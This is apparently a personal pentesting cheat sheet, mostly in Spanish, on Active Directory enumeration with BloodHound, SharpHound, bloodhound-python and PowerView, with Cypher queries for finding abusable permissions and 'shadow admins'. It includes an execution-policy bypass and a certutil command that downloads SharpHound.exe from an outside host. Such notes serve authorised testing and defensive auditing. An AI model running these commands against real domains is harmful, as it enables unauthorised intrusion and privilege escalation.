Select a result to preview

BloodHound

#bloodhound #ActiveDirectory #privesc

BloodHound

cd /BloodHound
docker compose up

||

sudo neo4j start
./BloodHound

SharpHound

Set-ExecutionPolicy Bypass -Scope Process -Force
upload /ruta .
Import-Module .\Sharp

BloodHound.py

sudo ntpdate -u IP-DC
bloodhound-python  -d DOMAIN -ns IP -u USER -p PASS -c All --zip

sudo ntpdate -u IP-DC
bloodhound-python  -d DOMAIN -dc DC.DOMAIN -ns IP -u 'USER' -p PASS -c All --zip

ns para resolver nombres

bloodhound-ce-python

bloodhound-ce-python -d DOMAIN -dc DC.DOMAIN -ns IP -u 'user' -p 'pass' -c All --zip

PowerView

Set-ExecutionPolicy Bypass -Scope Process -Force
upload /ruta .
. .\PowerView.ps1

certutil -urlcache -f http://IP:PORT/SharpHound.exe SharpHound.exe

QUERYS 🏁

Que usuarios/ordenadores del dominio tienen permisos directos sobre otros usuarios/ordenadores

MATCH p=(n:Base)-[r:GenericAll|GenericWrite|WriteOwner|WriteDacl|ForceChangePassword|AllExtendedRights|AddMember|AllowedToDelegate|AllowedToAct|AdminTo|CanPSRemote|CanRDP|ExecuteDCOM|AddSelf|DCSync|ReadLAPSPassword|ReadGMSAPassword|DumpSMSAPassword|AddAllowedToAct|WriteSPN|AddKeyCredentialLink|SyncLAPSPassword|WriteAccountRestrictions|WriteGPLink|ADCSESC1|ADCSESC3|ADCSESC4|ADCSESC6a|ADCSESC6b|ADCSESC9a|ADCSESC9b|ADCSESC10a|ADCSESC10b|ADCSESC13|WriteOwnerLimitedRights|OwnsLimitedRights|CanApplyGPO|ManageCA|ManageCertificates]->(:Base)
WHERE (n:User OR n:Computer)

// Uncomment the below to only search enabled principals.
// AND n.enabled = true

RETURN p
LIMIT 1000

Que grupos del dominio tienen permisos directos sobre otros usuarios/ordenadores, excluyendo grupos administradores y operadores

MATCH p=(n:Group)-[r:GenericAll|GenericWrite|WriteOwner|WriteDacl|ForceChangePassword|AllExtendedRights|AddMember|AllowedToDelegate|AllowedToAct|AdminTo|CanPSRemote|CanRDP|ExecuteDCOM|AddSelf|DCSync|ReadLAPSPassword|ReadGMSAPassword|DumpSMSAPassword|AddAllowedToAct|WriteSPN|AddKeyCredentialLink|SyncLAPSPassword|WriteAccountRestrictions|WriteGPLink|ADCSESC1|ADCSESC3|ADCSESC4|ADCSESC6a|ADCSESC6b|ADCSESC9a|ADCSESC9b|ADCSESC10a|ADCSESC10b|ADCSESC13|WriteOwnerLimitedRights|OwnsLimitedRights|CanApplyGPO|ManageCA|ManageCertificates]->(:Base)

// Opcional: Descomenta la siguiente línea para excluir a los grupos de Administradores y Operators y buscar verdaderos "Shadow Admins"
WHERE NOT n.name CONTAINS "ADMIN" 
AND NOT n.name CONTAINS "ACCOUNT OPERATORS"
AND NOT n.name CONTAINS "BACKUP OPERATORS"
AND NOT n.name CONTAINS "PRINT OPERATORS"
AND NOT n.name CONTAINS "EXCHANGE"


RETURN p
LIMIT 1000